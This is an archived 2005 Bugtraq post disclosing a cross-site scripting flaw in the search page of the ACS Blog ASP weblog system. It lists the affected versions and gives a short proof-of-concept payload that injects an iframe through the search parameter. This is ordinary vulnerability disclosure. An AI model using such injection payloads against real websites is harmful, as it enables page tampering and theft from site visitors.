XSS in ACS blog

From: farhad koosha (farhadkey_at_yahoo.com)
Date: 03/17/05

Next message: Jonathan Whiteley: "PHP mcNews arbitrary file inclusion"

Previous message: Hongzhen Zhou: "Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 17 Mar 2005 08:24:01 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

Vulnerable :

ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b

Code :

/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>

Vendor URL : http://www.asppress.com

Next message: Jonathan Whiteley: "PHP mcNews arbitrary file inclusion"

Previous message: Hongzhen Zhou: "Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

www.derkeiler.com > Mailing-Lists > securityfocus > bugtraq > 2005-03